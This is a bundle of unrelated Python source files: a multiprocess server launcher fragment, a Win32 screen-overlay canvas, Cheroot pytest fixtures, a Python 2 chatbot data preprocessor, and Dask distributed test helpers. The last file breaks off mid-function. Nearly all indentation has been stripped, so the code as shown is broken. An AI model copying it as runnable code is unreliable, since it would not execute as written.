process = mp.Process(target=serve, kwargs=server_settings)
process.daemon = True
process.start()
processes.append(process)
    # Wait for all worker processes to exit
for process in processes:
process.join()
# the above processes will block this until they're stopped
for process in processes:
process.terminate()
server_settings.get("sock").close()
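# Usage sketch (illustrative, not part of the original file): serve() expects
# an app object exposing at least `debug`, `asgi`, `stop()` and
# `config.GRACEFUL_SHUTDOWN_TIMEOUT` (all referenced above). A multi-worker
# launch might look like:
#
#     settings = dict(host="127.0.0.1", port=8080, app=my_app,
#                     protocol=HttpProtocol, backlog=100)
#     serve_multiple(settings, workers=4)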
|
screencanvas.py
|
import win32api, win32con, win32gui, win32ui
import ctypes
from typing import List
import threading
import time
import string
import uuid
import queue
from . import rectangle, win32_contants
def draw_loop(_queue: queue.Queue):
while True:
try:
canvas = _queue.get(block=True, timeout=0.02)
except queue.Empty:
pass
else:
canvas.initial_draw()
finally:
win32gui.PumpWaitingMessages()
draw_queue = queue.Queue()
draw_thread = threading.Thread(target=draw_loop, args=(draw_queue,), daemon=True)
draw_thread.start()
class ScreenCanvas:
def __init__(
self,
x = 0,
y = 0,
width = ctypes.windll.user32.GetSystemMetrics(win32_contants.SM_CXSCREEN),
height = ctypes.windll.user32.GetSystemMetrics(win32_contants.SM_CYSCREEN),
font_color = (0, 0, 0)
):
self.window_handle = None
self.x = x
self.y = y
self.width = width
self.height = height
self.font_color = font_color
self.rectangles: List[rectangle.Rectangle] = []
self._wndClassAtom, self._hInstance = self._win32_setup()
self.window_rendered = threading.Event()
self.render_lock = threading.Lock()
def add_rectangle(self, x: int, y: int, width: int, height: int, text=None):
rect = rectangle.Rectangle(x, y, width, height, text=text)
self.rectangles.append(rect)
def reset(self):
self.rectangles = []
def render(self):
with self.render_lock:
if self.window_handle is None:
self.window_handle = 'placeholder'
draw_queue.put(self)
else:
self.window_rendered.wait()
win32gui.RedrawWindow(self.window_handle, None, None, win32_contants.RDW_INVALIDATE | win32_contants.RDW_ERASE)
def initial_draw(self):
self.window_handle = win32gui.CreateWindowEx(
win32_contants.EX_STYLE,
self._wndClassAtom,
None, # WindowName
win32_contants.STYLE,
self.x,
self.y,
self.width,
self.height,
None, # hWndParent
None, # hMenu
self._hInstance,
None # lpParam
)
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms633540(v=vs.85).aspx
win32gui.SetLayeredWindowAttributes(self.window_handle, 0x00ffffff, 255, win32_contants.LWA_COLORKEY | win32_contants.LWA_ALPHA)
# http://msdn.microsoft.com/en-us/library/windows/desktop/dd145167(v=vs.85).aspx
#win32gui.UpdateWindow(self.window_handle)
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms633545(v=vs.85).aspx
win32gui.SetWindowPos(self.window_handle, win32_contants.HWND_TOPMOST, 0, 0, 0, 0,
win32_contants.SWP_NOACTIVATE | win32_contants.SWP_NOMOVE | win32_contants.SWP_NOSIZE | win32_contants.SWP_SHOWWINDOW)
self.window_rendered.set()
def _win_message(self, hWnd, message, wParam, lParam):
if message == win32_contants.WM_PAINT:
device_context_handle, paintStruct = win32gui.BeginPaint(hWnd)
dpiScale = ctypes.windll.gdi32.GetDeviceCaps(device_context_handle, win32_contants.LOGPIXELSX) / 60.0
fontSize = 14
# http://msdn.microsoft.com/en-us/library/windows/desktop/dd145037(v=vs.85).aspx
lf = win32gui.LOGFONT()
lf.lfFaceName = "Times New Roman"
# lf.lfHeight = int(round(dpiScale * fontSize))
lf.lfHeight = 20
lf.lfWeight = 0
# Use nonantialiased to remove the white edges around the text.
lf.lfQuality = win32con.NONANTIALIASED_QUALITY
hf = win32gui.CreateFontIndirect(lf)
win32gui.SetTextColor(device_context_handle, win32_color(self.font_color))
win32gui.SelectObject(device_context_handle, hf)
self._draw(device_context_handle)
win32gui.EndPaint(hWnd, paintStruct)
return 0
elif message == win32_contants.WM_DESTROY:
win32gui.PostQuitMessage(0)
return 0
else:
return win32gui.DefWindowProc(hWnd, message, wParam, lParam)
def _draw(self, device_context_handle):
for rect in self.rectangles:
rect.draw(device_context_handle)
def _win32_setup(self):
hInstance = win32api.GetModuleHandle()
className = str(uuid.uuid4()) # probably a better way to do this
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms633576(v=vs.85).aspx
# win32gui does not support WNDCLASSEX.
wndClass = win32gui.WNDCLASS()
# http://msdn.microsoft.com/en-us/library/windows/desktop/ff729176(v=vs.85).aspx
wndClass.style = win32con.CS_HREDRAW | win32con.CS_VREDRAW
wndClass.lpfnWndProc = self._win_message
wndClass.hInstance = hInstance
wndClass.hCursor = win32gui.LoadCursor(None, win32con.IDC_ARROW)
wndClass.hbrBackground = win32gui.GetStockObject(win32con.WHITE_BRUSH)
wndClass.lpszClassName = className
# win32gui does not support RegisterClassEx
wndClassAtom = win32gui.RegisterClass(wndClass)
return wndClassAtom, hInstance
def win32_color(color):
if isinstance(color, (tuple, list)):
return win32api.RGB(*color)
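# Minimal usage sketch (not part of the original module; coordinates and text
# are arbitrary examples): draw a labelled rectangle overlay on the screen for
# a few seconds. Run via `python -m` so the relative imports of the sibling
# `rectangle` and `win32_contants` modules resolve.
if __name__ == "__main__":
    canvas = ScreenCanvas()
    canvas.add_rectangle(100, 100, 300, 150, text="hello")
    canvas.render()
    time.sleep(5)  # keep the overlay visible before the process exits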
|
testing.py
|
"""Pytest fixtures and other helpers for doing testing by end-users."""
from contextlib import closing
import errno
import socket
import threading
import time
import pytest
from six.moves import http_client
import cheroot.server
from cheroot.test import webtest
import cheroot.wsgi
EPHEMERAL_PORT = 0
NO_INTERFACE = None # Using this or '' will cause an exception
ANY_INTERFACE_IPV4 = '0.0.0.0'
ANY_INTERFACE_IPV6 = '::'
config = {
'bind_addr': (NO_INTERFACE, EPHEMERAL_PORT),
'wsgi_app': None,
}
def cheroot_server(server_factory):
"""Set up and tear down a Cheroot server instance."""
conf = config.copy()
bind_port = conf.pop('bind_addr')[-1]
for interface in ANY_INTERFACE_IPV6, ANY_INTERFACE_IPV4:
try:
actual_bind_addr = (interface, bind_port)
httpserver = server_factory( # create it
bind_addr=actual_bind_addr,
**conf
)
except OSError:
pass
else:
break
threading.Thread(target=httpserver.safe_start).start() # spawn it
while not httpserver.ready: # wait until fully initialized and bound
time.sleep(0.1)
yield httpserver
httpserver.stop() # destroy it
@pytest.fixture(scope='module')
def wsgi_server():
"""Set up and tear down a Cheroot WSGI server instance."""
for srv in cheroot_server(cheroot.wsgi.Server):
yield srv
@pytest.fixture(scope='module')
def native_server():
"""Set up and tear down a Cheroot HTTP server instance."""
for srv in cheroot_server(cheroot.server.HTTPServer):
yield srv
class _TestClient(object):
def __init__(self, server):
self._interface, self._host, self._port = _get_conn_data(server)
self._http_connection = self.get_connection()
self.server_instance = server
def get_connection(self):
name = '{interface}:{port}'.format(
interface=self._interface,
port=self._port,
)
return http_client.HTTPConnection(name)
def request(
self, uri, method='GET', headers=None, http_conn=None,
protocol='HTTP/1.1',
):
return webtest.openURL(
uri, method=method,
headers=headers,
host=self._host, port=self._port,
http_conn=http_conn or self._http_connection,
protocol=protocol,
)
def __getattr__(self, attr_name):
def _wrapper(uri, **kwargs):
http_method = attr_name.upper()
return self.request(uri, method=http_method, **kwargs)
return _wrapper
def _probe_ipv6_sock(interface):
# Alternate way is to check IPs on interfaces using glibc, like:
# github.com/Gautier/minifail/blob/master/minifail/getifaddrs.py
try:
with closing(socket.socket(family=socket.AF_INET6)) as sock:
sock.bind((interface, 0))
except (OSError, socket.error) as sock_err:
# In Python 3 socket.error is an alias for OSError
# In Python 2 socket.error is a subclass of IOError
if sock_err.errno != errno.EADDRNOTAVAIL:
raise
else:
return True
return False
def _get_conn_data(server):
host, port = server.bind_addr
interface = webtest.interface(host)
if ':' in interface and not _probe_ipv6_sock(interface):
interface = '127.0.0.1'
if ':' in host:
host = interface
return interface, host, port
def get_server_client(server):
"""Create and return a test client for the given server."""
return _TestClient(server)
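# Usage sketch (illustrative, not part of the original module): the dynamic
# __getattr__ on _TestClient turns any attribute access into an HTTP verb, so
# a test using one of the server fixtures above might do:
#
#     def test_root(wsgi_server):
#         client = get_server_client(wsgi_server)
#         response = client.get('/')   # same as client.request('/', method='GET')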
|
dataprocessor.py
|
import os
import util.tokenizer
import util.vocabutils as vocab_utils
from tensorflow.python.platform import gfile
from random import shuffle
from multiprocessing import Process, Lock
import time
from math import floor
class DataProcessor(object):
def __init__(self, max_vocab_size, source_data_path,
processed_data_path, train_frac,
num_lines=4, max_target_length=50, max_source_length=200):
self.MAX_SOURCE_TOKEN_LENGTH = max_source_length
self.MAX_TARGET_TOKEN_LENGTH = max_target_length
self.NUM_LINES = num_lines
self.tokenizer = util.tokenizer.basic_tokenizer
assert train_frac > 0.0 and train_frac <= 1.0, "Train frac not between 0 and 1..."
self.train_frac = train_frac
self.max_vocab_size = max_vocab_size
self.source_data_path = source_data_path
self.processed_data_path = processed_data_path
train_path = os.path.join(processed_data_path, "train/")
test_path = os.path.join(processed_data_path, "test/")
if not os.path.exists(train_path):
os.makedirs(train_path)
if not os.path.exists(test_path):
os.makedirs(test_path)
self.data_source_train = os.path.join(train_path,
"data_source_train.txt")
self.data_target_train = os.path.join(train_path,
"data_target_train.txt")
self.data_source_test = os.path.join(test_path,
"data_source_test.txt")
self.data_target_test = os.path.join(test_path,
"data_target_test.txt")
print "Checking to see what data processor needs to do..."
vocab_path = os.path.join(processed_data_path, "vocab.txt")
self.vocab_exists = gfile.Exists(vocab_path)
self.data_files_exist = self.vocab_exists and \
gfile.Exists(self.data_source_train) and \
gfile.Exists(self.data_target_train) and \
gfile.Exists(self.data_source_test) and \
gfile.Exists(self.data_target_test)
def run(self):
if not self.data_files_exist:
print "Obtaining raw text conversation files..."
text_files = self.getRawFileList()
# randomly shuffle order of files
shuffle(text_files)
num_train_files = int(self.train_frac * len(text_files))
#create vocab file
if not self.vocab_exists:
vocab_builder = vocab_utils.VocabBuilder(self.max_vocab_size, self.processed_data_path)
print "Building vocab..."
for text_file in text_files:
with open(text_file, "r+") as f:
vocab_builder.growVocab(f.read())
print "Creating vocab file..."
vocab_builder.createVocabFile()
if not self.data_files_exist:
self.vocab_mapper = vocab_utils.VocabMapper(self.processed_data_path)
#create source and target token id files
processes = []
print "Creating token id data source and target train files..."
if len(text_files) == 1:
num_train_files = 1
text_files = self.splitSingle2Many(text_files[0], self.train_frac)
p1 = Process(target=self.loopParseTextFiles, args=([text_files[:num_train_files]], True))
p1.start()
processes.append(p1)
print "Creating token id data source and target test files..."
print "This is going to take a while..."
p2 = Process(target=self.loopParseTextFiles, args=([text_files[num_train_files:]], False))
p2.start()
processes.append(p2)
for p in processes:
if p.is_alive():
p.join()
print "Done data pre-processing..."
def loopParseTextFiles(self, text_files, is_train):
for text_file in text_files[0]:
self.parseTextFile(text_file, is_train)
def splitSingle2Many(self, text_file, train_frac):
temp = "temp/"
if not gfile.Exists(temp):
os.mkdir(temp)
with open(text_file, 'r') as f:
sentences = f.read().split('\n')
num_train = int(floor(train_frac * len(sentences)))
if num_train %2 != 0:
num_train += 1
num_test = len(sentences) - num_train
print "num train {0}, num test {1}".format(num_train, num_test)
train_file_name = "{0}{1}train.txt".format(temp,int(time.time()))
test_file_name = "{0}{1}test.txt".format(temp,int(time.time()))
with open(train_file_name, "w+") as f2:
f2.write("\n".join(sentences[:num_train]))
with open(test_file_name, "w+") as f2:
f2.write("\n".join(sentences[num_train:]))
return [train_file_name, test_file_name]
def parseTextFile(self, text_file, is_train):
with open(text_file, "r+") as f:
line_buffer = []
for line in f:
if len(line_buffer) > self.NUM_LINES:
self.findSentencePairs(line_buffer, is_train)
line_buffer.pop(0)
line_buffer.append(line)
def getRawFileList(self):
text_files = []
for f in os.listdir(self.source_data_path):
if not f.endswith("~"):
text_files.append(os.path.join(self.source_data_path, f))
return text_files
def findSentencePairs(self, line_buffer, is_train):
assert len(line_buffer) == self.NUM_LINES+1, "Num lines: {0}, length of line buffer: {1}".format(self.NUM_LINES, len(line_buffer))
if len(line_buffer) > 0:
for i in range(1, len(line_buffer)):
source_sentences = " ".join(line_buffer[:i])
source_sentences = source_sentences.strip()
target_sentences = line_buffer[i].strip()
#Tokenize sentences
source_sentences = self.tokenizer(source_sentences)
target_sentences = self.tokenizer(target_sentences)
#Convert tokens to id string, reverse source inputs
source_sentences = list(reversed(self.vocab_mapper.tokens2Indices(source_sentences)))
target_sentences = self.vocab_mapper.tokens2Indices(target_sentences)
#remove outliers (really long sentences) from data
if len(source_sentences) >= self.MAX_SOURCE_TOKEN_LENGTH or \
len(target_sentences) >= self.MAX_TARGET_TOKEN_LENGTH:
print "skipped {0} and {1}".format(len(source_sentences), len(target_sentences))
continue
source_sentences = " ".join([str(x) for x in source_sentences])
target_sentences = " ".join([str(x) for x in target_sentences])
data_source = self.data_source_train
data_target = self.data_target_train
if not is_train:
data_source = self.data_source_test
data_target = self.data_target_test
with open(data_source, "a+") as f2:
f2.write(source_sentences + "\n")
with open(data_target, "a+") as f2:
f2.write(target_sentences + "\n")
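# Minimal usage sketch (not part of the original module; the paths and sizes
# below are illustrative assumptions): build the vocab and the token-id
# train/test files from a directory of raw conversation text files.
if __name__ == "__main__":
    processor = DataProcessor(40000, "data/raw/", "data/processed/",
                              train_frac=0.9)
    processor.run()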
|
utils_test.py
|
import asyncio
import collections
import gc
from contextlib import contextmanager, suppress
import copy
import functools
from glob import glob
import io
import itertools
import logging
import logging.config
import os
import queue
import re
import shutil
import signal
import socket
import subprocess
import sys
import tempfile
import threading
from time import sleep
import uuid
import warnings
import weakref
try:
import ssl
except ImportError:
ssl = None
import pytest
import dask
from tlz import merge, memoize, assoc
from tornado import gen
from tornado.ioloop import IOLoop
from . import system
from .client import default_client, _global_clients, Client
from .compatibility import WINDOWS
from .comm import Comm
from .config import initialize_logging
from .core import connect, rpc, CommClosedError
from .deploy import SpecCluster
from .metrics import time
from .process import _cleanup_dangling
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (
log_errors,
mp_context,
get_ip,
get_ipv6,
DequeHandler,
reset_logger_locks,
sync,
iscoroutinefunction,
thread_state,
_offload_executor,
TimeoutError,
)
from .worker import Worker
from .nanny import Nanny
try:
import dask.array # register config
except ImportError:
pass
logger = logging.getLogger(__name__)
logging_levels = {
name: logger.level
for name, logger in logging.root.manager.loggerDict.items()
if isinstance(logger, logging.Logger)
}
_offload_executor.submit(lambda: None).result() # create thread during import
@pytest.fixture(scope="session")
def valid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("print('hello world!')")
return local_file
@pytest.fixture(scope="session")
def client_contract_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("distributed_script.py")
lines = (
"from distributed import Client",
"e = Client('127.0.0.1:8989')",
"print(e)",
)
local_file.write("\n".join(lines))
return local_file
@pytest.fixture(scope="session")
def invalid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("a+1")
return local_file
async def cleanup_global_workers():
for worker in Worker._instances:
await worker.close(report=False, executor_wait=False)
@pytest.fixture
def loop():
with check_instances():
with pristine_loop() as loop:
# Monkey-patch IOLoop.start to wait for loop stop
orig_start = loop.start
is_stopped = threading.Event()
is_stopped.set()
def start():
is_stopped.clear()
try:
orig_start()
finally:
is_stopped.set()
loop.start = start
yield loop
# Stop the loop in case it's still running
try:
sync(loop, cleanup_global_workers, callback_timeout=0.500)
loop.add_callback(loop.stop)
except RuntimeError as e:
if not re.match("IOLoop is clos(ed|ing)", str(e)):
raise
except TimeoutError:
pass
else:
is_stopped.wait()
@pytest.fixture
def loop_in_thread():
with pristine_loop() as loop:
thread = threading.Thread(target=loop.start, name="test IOLoop")
thread.daemon = True
thread.start()
loop_started = threading.Event()
loop.add_callback(loop_started.set)
loop_started.wait()
yield loop
loop.add_callback(loop.stop)
thread.join(timeout=5)
@pytest.fixture
def zmq_ctx():
import zmq
ctx = zmq.Context.instance()
yield ctx
ctx.destroy(linger=0)
@contextmanager
def pristine_loop():
IOLoop.clear_instance()
IOLoop.clear_current()
loop = IOLoop()
loop.make_current()
assert IOLoop.current() is loop
try:
yield loop
finally:
try:
loop.close(all_fds=True)
except (KeyError, ValueError):
pass
IOLoop.clear_instance()
IOLoop.clear_current()
@contextmanager
def mock_ipython():
from unittest import mock
from distributed._ipython_utils import remote_magic
ip = mock.Mock()
ip.user_ns = {}
ip.kernel = None
def get_ip():
return ip
with mock.patch("IPython.get_ipython", get_ip), mock.patch(
"distributed._ipython_utils.get_ipython", get_ip
):
yield ip
# cleanup remote_magic client cache
for kc in remote_magic._clients.values():
kc.stop_channels()
remote_magic._clients.clear()
original_config = copy.deepcopy(dask.config.config)
def reset_config():
dask.config.config.clear()
dask.config.config.update(copy.deepcopy(original_config))
def nodebug(func):
"""
A decorator to disable debug facilities during timing-sensitive tests.
Warning: this doesn't affect already created IOLoops.
"""
@functools.wraps(func)
def wrapped(*args, **kwargs):
old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
try:
return func(*args, **kwargs)
finally:
if old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = old_asyncio_debug
return wrapped
def nodebug_setup_module(module):
"""
A setup_module() that you can install in a test module to disable
debug facilities.
"""
module._old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if module._old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
def nodebug_teardown_module(module):
"""
A teardown_module() that you can install in a test module to reenable
debug facilities.
"""
if module._old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = module._old_asyncio_debug
def inc(x):
return x + 1
def dec(x):
return x - 1
def mul(x, y):
return x * y
def div(x, y):
return x / y
def deep(n):
if n > 0:
return deep(n - 1)
else:
return True
def throws(x):
raise RuntimeError("hello!")
def double(x):
return x * 2
def slowinc(x, delay=0.02):
sleep(delay)
return x + 1
def slowdec(x, delay=0.02):
sleep(delay)
return x - 1
def slowdouble(x, delay=0.02):
sleep(delay)
return 2 * x
def randominc(x, scale=1):
from random import random
sleep(random() * scale)
return x + 1
def slowadd(x, y, delay=0.02):
sleep(delay)
return x + y
def slowsum(seq, delay=0.02):
sleep(delay)
return sum(seq)
def slowidentity(*args, **kwargs):
delay = kwargs.get("delay", 0.02)
sleep(delay)
if len(args) == 1:
return args[0]
else:
return args
def run_for(duration, timer=time):
"""
Burn CPU for *duration* seconds.
"""
deadline = timer() + duration
while timer() <= deadline:
pass
# This dict grows at every varying() invocation
_varying_dict = collections.defaultdict(int)
_varying_key_gen = itertools.count()
class _ModuleSlot:
def __init__(self, modname, slotname):
self.modname = modname
self.slotname = slotname
def get(self):
return getattr(sys.modules[self.modname], self.slotname)
def varying(items):
"""
Return a function that returns a result (or raises an exception)
from *items* at each call.
"""
# cloudpickle would serialize the *values* of all globals
# used by *func* below, so we can't use `global <something>`.
# Instead look up the module by name to get the original namespace
# and not a copy.
slot = _ModuleSlot(__name__, "_varying_dict")
key = next(_varying_key_gen)
def func():
dct = slot.get()
i = dct[key]
if i == len(items):
raise IndexError
else:
x = items[i]
dct[key] = i + 1
if isinstance(x, Exception):
raise x
else:
return x
return func
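# Usage sketch (illustrative): each call to the returned function steps
# through *items*, re-raising any exception instances it encounters and
# raising IndexError once the items are exhausted.
#
#     f = varying([1, ZeroDivisionError("boom"), 3])
#     f()   # -> 1
#     f()   # raises ZeroDivisionError
#     f()   # -> 3
#     f()   # raises IndexError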
def map_varying(itemslists):
"""
Like *varying*, but return the full specification for a map() call
on multiple items lists.
"""
def apply(func, *args, **kwargs):
return func(*args, **kwargs)
return apply, list(map(varying, itemslists))
async def geninc(x, delay=0.02):
await asyncio.sleep(delay)
return x + 1
async def asyncinc(x, delay=0.02):
await asyncio.sleep(delay)
return x + 1
_readone_queues = {}
async def readone(comm):
"""
Read one message at a time from a comm that reads lists of
messages.
"""
try:
q = _readone_queues[comm]
except KeyError:
q = _readone_queues[comm] = asyncio.Queue()
async def background_read():
while True:
try:
messages = await comm.read()
except CommClosedError:
break
for msg in messages:
q.put_nowait(msg)
q.put_nowait(None)
del _readone_queues[comm]
        # Schedule the background reader on the event loop; simply calling an
        # ``async def`` only creates a coroutine object and never runs it.
        asyncio.ensure_future(background_read())
msg = await q.get()
if msg is None:
raise CommClosedError
else:
return msg
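# Usage sketch (illustrative): inside an async test, drain a batched comm one
# message at a time:
#
#     msg = await readone(comm)   # raises CommClosedError once the comm closes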
def run_scheduler(q, nputs, port=0, **kwargs):
from distributed import Scheduler
# On Python 2.7 and Unix, fork() is used to spawn child processes,
# so avoid inheriting the parent's IO loop.
with pristine_loop() as loop:
async def _():
scheduler = await Scheduler(
validate=True, host="127.0.0.1", port=port, **kwargs
)
for i in range(nputs):
q.put(scheduler.address)
await scheduler.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
def run_worker(q, scheduler_q, **kwargs):
from distributed import Worker
reset_logger_locks()
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
async def _():
worker = await Worker(scheduler_addr, validate=True, **kwargs)
q.put(worker.address)
await worker.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
def run_nanny(q, scheduler_q, **kwargs):
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
async def _():
worker = await Nanny(scheduler_addr, validate=True, **kwargs)
q.put(worker.address)
await worker.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
@contextmanager
def check_active_rpc(loop, active_rpc_timeout=1):
active_before = set(rpc.active)
yield
    # Some streams can take a bit of time to notice their peer
    # has closed; a coroutine (*) may still be waiting for a
    # CommClosedError before it gets around to calling close_rpc().
# This would happen especially if a non-localhost address is used,
# as Nanny does.
# (*) (example: gather_from_workers())
def fail():
pytest.fail(
"some RPCs left active by test: %s" % (set(rpc.active) - active_before)
)
async def wait():
await async_wait_for(
lambda: len(set(rpc.active) - active_before) == 0,
timeout=active_rpc_timeout,
fail_func=fail,
)
loop.run_sync(wait)
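# Usage sketch (illustrative): wrap a test body to assert that it does not
# leave RPC connections behind:
#
#     with check_active_rpc(loop):
#         ...   # test code that opens and closes rpc() connections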
@pytest.fixture
def cluster_fixture(loop):
with cluster() as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def s(cluster_fixture):
scheduler, workers = cluster_fixture
return scheduler
@pytest.fixture
def a(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[0]
@pytest.fixture
def b(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[1]
@pytest.fixture
def client(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
@pytest.fixture
def client_secondary(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
@contextmanager
def tls_cluster_context(
worker_kwargs=None, scheduler_kwargs=None, security=None, **kwargs
):
security = security or tls_only_security()
worker_kwargs = assoc(worker_kwargs or {}, "security", security)
scheduler_kwargs = assoc(scheduler_kwargs or {}, "security", security)
with cluster(
worker_kwargs=worker_kwargs, scheduler_kwargs=scheduler_kwargs, **kwargs
) as (s, workers):
yield s, workers
@pytest.fixture
def tls_cluster(loop, security):
with tls_cluster_context(security=security) as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def tls_client(tls_cluster, loop, security):
s, workers = tls_cluster
with Client(s["address"], security=security, loop=loop) as client:
yield client
@pytest.fixture
def security():
return tls_only_security()
@contextmanager
def cluster(
nworkers=2,
nanny=False,
worker_kwargs={},
active_rpc_timeout=1,
disconnect_timeout=3,
scheduler_kwargs={},
):
ws = weakref.WeakSet()
enable_proctitle_on_children()
with clean(timeout=active_rpc_timeout, threads=False) as loop:
if nanny:
_run_worker = run_nanny
else:
_run_worker = run_worker
# The scheduler queue will receive the scheduler's address
scheduler_q = mp_context.Queue()
# Launch scheduler
scheduler = mp_context.Process(
name="Dask cluster test: Scheduler",
target=run_scheduler,
args=(scheduler_q, nworkers + 1),
kwargs=scheduler_kwargs,
)
ws.add(scheduler)
scheduler.daemon = True
scheduler.start()
# Launch workers
workers = []
for i in range(nworkers):
q = mp_context.Queue()
fn = "_test_worker-%s" % uuid.uuid4()
kwargs = merge(
{
"nthreads": 1,
"local_directory": fn,
"memory_limit": system.MEMORY_LIMIT,
},
worker_kwargs,
)
proc = mp_context.Process(
name="Dask cluster test: Worker",
target=_run_worker,
args=(q, scheduler_q),
kwargs=kwargs,
)
ws.add(proc)
workers.append({"proc": proc, "queue": q, "dir": fn})
for worker in workers:
worker["proc"].start()
try:
for worker in workers:
worker["address"] = worker["queue"].get(timeout=5)
except queue.Empty:
raise pytest.xfail.Exception("Worker failed to start in test")
saddr = scheduler_q.get()
start = time()
try:
try:
security = scheduler_kwargs["security"]
rpc_kwargs = {"connection_args": security.get_connection_args("client")}
except KeyError:
rpc_kwargs = {}
with rpc(saddr, **rpc_kwargs) as s:
while True:
nthreads = loop.run_sync(s.ncores)
if len(nthreads) == nworkers:
break
if time() - start > 5:
raise Exception("Timeout on cluster creation")
# avoid sending processes down to function
yield {"address": saddr}, [
{"address": w["address"], "proc": weakref.ref(w["proc"])}
for w in workers
]
finally:
logger.debug("Closing out test cluster")
loop.run_sync(
lambda: disconnect_all(
[w["address"] for w in workers],
timeout=disconnect_timeout,
rpc_kwargs=rpc_kwargs,
)
)
loop.run_sync(
lambda: disconnect(
saddr, timeout=disconnect_timeout, rpc_kwargs=rpc_kwargs
)
)
scheduler.terminate()
scheduler_q.close()
scheduler_q._reader.close()
scheduler_q._writer.close()
for w in workers:
w["proc"].terminate()
w["queue"].close()
w["queue"]._reader.close()
w["queue"]._writer.close()
scheduler.join(2)
del scheduler
for proc in [w["proc"] for w in workers]:
proc.join(timeout=2)
with suppress(UnboundLocalError):
del worker, w, proc
del workers[:]
for fn in glob("_test_worker-*"):
with suppress(OSError):
shutil.rmtree(fn)
try:
client = default_client()
except ValueError:
pass
else:
client.close()
start = time()
while any(proc.is_alive() for proc in ws):
text = str(list(ws))
sleep(0.2)
assert time() < start + 5, ("Workers still around after five seconds", text)
async def disconnect(addr, timeout=3, rpc_kwargs=None):
rpc_kwargs = rpc_kwargs or {}
async def do_disconnect():
with suppress(EnvironmentError, CommClosedError):
with rpc(addr, **rpc_kwargs) as w:
await w.terminate(close=True)
await asyncio.wait_for(do_disconnect(), timeout=timeout)
async def disconnect_all(addresses, timeout=3, rpc_kwargs=None):
await asyncio.gather(*[disconnect(addr, timeout, rpc_kwargs) for addr in addresses])
def gen_test(timeout=10):
""" Coroutine test
@gen_test(timeout=5)
async def test_foo():
await ... # use tornado coroutines
"""
def _(func):
def test_func():
with clean() as loop:
if iscoroutinefunction(func):
cor = func
else:
cor = gen.coroutine(func)
loop.run_sync(cor, timeout=timeout)
return test_func
return _
from .scheduler import Scheduler
from .worker import Worker
async def start_cluster(
nthreads,
scheduler_addr,
loop,
security=None,
Worker=Worker,
scheduler_kwargs={},
worker_kwargs={},
):
s = await Scheduler(
loop=loop,
validate=True,
security=security,
port=0,
host=scheduler_addr,
**scheduler_kwargs,
)
workers = [
Worker(
s.address,
nthreads=ncore[1],
name=i,
security=security,
loop=loop,
validate=True,
host=ncore[0],
**(merge(worker_kwargs, ncore[2]) if len(ncore) > 2 else worker_kwargs),
)
for i, ncore in enumerate(nthreads)
]
# for w in workers:
# w.rpc = workers[0].rpc
await asyncio.gather(*workers)
start = time()
while len(s.workers) < len(nthreads) or any(
comm.comm is None for comm in s.stream_comms.values()
):
await asyncio.sleep(0.01)
if time() - start > 5:
await asyncio.gather(*[w.close(timeout=1) for w in workers])
await s.close(fast=True)
raise Exception("Cluster creation timeout")
return s, workers
async def end_cluster(s, workers):
logger.debug("Closing out test cluster")
async def end_worker(w):
with suppress(TimeoutError, CommClosedError, EnvironmentError):
await w.close(report=False)
await asyncio.gather(*[end_worker(w) for w in workers])
await s.close() # wait until scheduler stops completely
s.stop()
def gen_cluster(
nthreads=[("127.0.0.1", 1), ("127.0.0.1", 2)],
ncores=None,
scheduler="127.0.0.1",
timeout=10,
security=None,
Worker=Worker,
client=False,
scheduler_kwargs={},
worker_kwargs={},
client_kwargs={},
active_rpc_timeout=1,
config={},
clean_kwargs={},
allow_unclosed=False,
):
    """ Coroutine test with small cluster

    @gen_cluster()
    async def test_foo(scheduler, worker1, worker2):
        await ...  # use tornado coroutines

    See also:
        start
        end
    """
    from distributed import Client
if ncores is not None:
warnings.warn("ncores= has moved to nthreads=", stacklevel=2)
nthreads = ncores
worker_kwargs = merge(
{"memory_limit": system.MEMORY_LIMIT, "death_timeout": 10}, worker_kwargs
)
def _(func):
if not iscoroutinefunction(func):
func = gen.coroutine(func)
def test_func():
result = None
workers = []
with clean(timeout=active_rpc_timeout, **clean_kwargs) as loop:
async def coro():
with dask.config.set(config):
s = False
for i in range(5):
try:
s, ws = await start_cluster(
nthreads,
scheduler,
loop,
security=security,
Worker=Worker,
scheduler_kwargs=scheduler_kwargs,
worker_kwargs=worker_kwargs,
)
except Exception as e:
logger.error(
"Failed to start gen_cluster, retrying",
exc_info=True,
)
await asyncio.sleep(1)
else:
workers[:] = ws
args = [s] + workers
break
if s is False:
raise Exception("Could not start cluster")
if client:
c = await Client(
s.address,
loop=loop,
security=security,
asynchronous=True,
**client_kwargs,
)
args = [c] + args
try:
future = func(*args)
if timeout:
future = asyncio.wait_for(future, timeout)
result = await future
if s.validate:
s.validate_state()
finally:
if client and c.status not in ("closing", "closed"):
await c._close(fast=s.status == "closed")
await end_cluster(s, workers)
await asyncio.wait_for(cleanup_global_workers(), 1)
try:
c = await default_client()
except ValueError:
pass
else:
await c._close(fast=True)
def get_unclosed():
return [c for c in Comm._instances if not c.closed()] + [
c
